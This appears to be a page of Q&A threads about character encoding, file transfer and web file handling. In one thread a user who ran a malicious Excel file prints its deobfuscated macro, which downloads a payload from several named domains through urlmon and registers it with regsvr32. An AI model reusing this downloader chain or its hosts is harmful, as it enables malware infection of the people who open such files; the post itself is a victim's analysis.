Twitter Widget behind proxy - search

I'm trying to use Twitter widget in a site which server is inside my corporation, hence, behind its proxy.
I can't use directly the code they provide, since I can't reach the source address.
<script charset="utf-8" src="http://widgets.twimg.com/j/2/widget.js"></script>
I was wondering if I could make a local copy of the js so I could avoid this problem, but, when I did so I get:
ActionView::WrongEncodingError in Home#index
Your template was not saved as valid UTF-8. Please either specify UTF-8 as the encoding for your template in your text editor, or mark the template with its encoding by inserting the following as the first line of the template:
# encoding: <name of correct encoding>.
But the encoding its already set.
I'm really really newby with this stuff.
Please help.

The error you get is because ruby needs an explicit encoding to parse correctly a non latin-1 file.
In each ruby file that has utf-8 characters you need a first line like the example:
# encoding: UTF-8
As for the main problem in your question, you can try, but probably communication with twitter is blocked.
You should talk to your system administrator to try to get access to twitter for your app.

Related

caret ^ is converting to some special symbol

I'm transferring the file which has the content like below from mainframe system to a Unix instance. I've a delimiter in the file as ^&*. I'm sending the same in mainframe but when we receive the file in the unix we're receiving as Ø&*.
I'm using connect direct to transfer the file from one system to another.
File Type: Flat File, File transfer: CD (Connect Direct)
file content
H^&*20220407^&*160009^&*2006
T^&*1
But when I receive the file in the unix server I can the file content is changed. Mainly ^ is converted to Ø.
HØ&*20220407Ø&*160009Ø&*2006
TØ&*1
This is most surely a code page problem.
The data in the file on the mainframe is (most probably) in some EBCDIC code page. ConnectDirect is doing a code page tranformation when sending the file to that UNIX system. This is what the XLATE(YES) means.
However, there is some default code page "from"-"to" pair configured, which is being used with XLATE(YES). But this probably is not the correct pair. You need to
find out what EBCDIC code page the data on the mainframe is encoded in. Is it IBM-037, IBM-1047, IBM-500, IBM-273, etc. There are many.
find out what code page the data shall be in on the UNIX side: UTF-8, ISO8859-1, 437, etc. There are many.
make sure ConnectDirect will transform using the correct source and target code pages.
Ask your ConnectDirect support people to help you with this.

urlmon / URLDownloadToFil - Skipped downloads

To cut a long story short, I got duped: I opened a malicious Excel file and ran the macro.
After digging through the guts of the Excel file, the payload was highly obfuscated but I managed to piece it together:
=CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://onlinebrandedcontent.com/XXXXXX/","..\enu.ocx",0,0)
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://onlinebrandedcontent.com/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"https://onlyfansgo.com/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://www.marcoantonioguerrerafitness.com/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://acceptanceh.us/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CALL("urlmon","URLDownloadToFilA","JJCCBB",0,"http://gloselweb.com/XXXXXX/","..\enu.ocx",0,0))
=IF(<0, CLOSE(0),)
=EXEC("C:\Windows\SysWow64\r"&"eg"&"sv"&"r32.exe /s ..\enu.ocx")
=RETURN()
Note: actual full URLs above redacted to avoid accidental exposure by anyone reading this.
When accessed, the malicious URLs contain the following contents:
onlinebrandedcontent: Standard Apache file index page with no contents
onlyfansgo: Boilerplate hosting provider "Account Suspended" page with no inclusions or Javascript.
marcoantonioguerrerafitness / acceptanceh / gloselweb: Triggers download of a (presumably malicious) DLL file
It appears the code above only got as far as the onlyfansgo URL (enu.ocx on my machine contains the harmless HTML "Account Suspended" markup with a reference to webmaster#onlyfansgo.com), so it looks like I dodged a bullet (regsvr32.exe would have attempted to register a HTML file and failed).
My question: Why did the payload pull the onlyfansgo URL response but stop there? If it was willing to accept a HTML file as a successful download, why did it not stop at onlinebrandedcontent? Is it something to do with the fact that onlyfansgo is the only HTTPS URL in the list?

Streaming pdf file from node server randomly just shows binary data on browser

I have a node app (specifically sails app) that is serving pdf file. My code for serving file looks like this.
request.get(pdfUrl).pipe(res)
And when I view the url for pdf, it renders the pdf fine. But sometimes, it just renders the binary data of pdf on browser like given below.
%PDF-1.4 1 0 obj << /Title (��) /Creator (��wkhtmltopdf
I am not able to figure out why is it failing to serve the pdf correctly just randomly. Is it chrome thing? or Am I missing something?
Leaving this here in the hope that it helps somebody - I have had similar issues multiple times and its either of two things:
You're using an HTTP connection to an HTTPS delivery (this is typical with websockets, where you must specify :443 in addition to the wss.
request's encoding parameter is serving plaintext instead of objects. This is done by setting encoding to null as follows: request({url: myUrl, encoding: null}).
Content types in headers - steering clear of this since it's obvious/others have covered this substantially enough already :)
I am pretty sure you're facing this due to (2). Have a look at https://github.com/request/request
encoding - Encoding to be used on setEncoding of response data. If
null, the body is returned as a Buffer. Anything else (including the
default value of undefined) will be passed as the encoding parameter
to toString() (meaning this is effectively utf8 by default). (Note: if
you expect binary data, you should set encoding: null.)
Since, the aforementioned suggestions didn't work for you, would like to see forensics from the following:
Are files that fail over a particular size? Is this a buffer issue at some level?
Does the presence of a certain character in the file cause this because it breaks some of your script?
Are the meta-data sections and file-endings the same across a failed and a successful file? How any media file is signed up-top, and how it's truncated down-bottom, can greatly impact how it is interpreted
You may need to include the content type header application/pdf in the node response to tell the recipient that what they're receiving is a PDF. Some browsers are smart enough to determine the content type from the data stream, but you can't assume that's always the case.
When Chrome downloads the PDF as text I would check the very end of the file. The PDF file contains the obligatory xref table at the end. So every valid PDF file should end with the following sequence: %EOF. If not then the request was interrupted or something gone wrong.
You also need HTTP header:
Content-Disposition:inline; filename=sample.pdf;
And
Content-Length: 200
Did you try to save what ever binary stuff you get on disk and open it manually by PDF reader? It could be corrupt.
I would suggest trying both of these:
Content-Type: application/pdf
Content-Disposition: attachment; filename="somefilename.pdf"
(or controlling Mime Type in other ways: https://www.npmjs.com/package/mime-types)

Uploading file, getting fakepath

I am trying to upload a video to youtube through their API
I use a HTML input field, but for some reason, it gives me a path like
C:\fakepath\..
Why is this and how can I get the right filepath, so I can use it in my request
<input type="file" name="fileName" data-schema-key="fileName">
This question has already been answered here: How to resolve the C:\fakepath?.
As commented in The Mystery of c:fakepath Unveiled:
According to the specifications of HTML5, a file upload control should not reveal the real local path to the file you have selected, if you manipulate its value string with JavaScript. Instead, the string that is returned by the script, which handles the file information is C:\fakepath.
If you want to leave just the filename (for "beauty" purposes), you can do a simple string replacing operation.
// Change the node's value by removing the fake path
inputNode.value = fileInput.value.replace("C:\\fakepath\\", "");
You can't, however, have access to the original file path. "It makes sense - as a client, you don't want the server to know your local machine's filesystem. It would be nice if all browsers did this", as already pointed out in the SO question I cited in the first line of this answer.

Wrong text encoding when parsing json data

I am curling a website and writing it to .json file; this file is input to my java code which parses it using json library and the necessary data is written back in a CSV file which i later use to store it in a database.
As you know data coming from a website can be in different formats so i make sure that i read and write in UTF-8 format, still i get wrong output.
For example, Østerriksk becomes �sterriksk.
I am doing all this in Linux. I think there is some encoding problem because this same code runs fine in Windows but not in Unix/Linux.
I am quite sure my java code is proper but i am not able to find out what I'm doing wrong.
You're reading the data as ISO 8859-1 but the file is actually UTF-8. I think there's an argument (or setting) to the file reader that should solve that.
Also: curl isn't going to care about the encodings. It's really something in your Java code that's wrong.
What kind of IDE are you using, for example this can happen if you are using Eclipse IDE, and not set your default encoding to utf-8 in properties.

Resources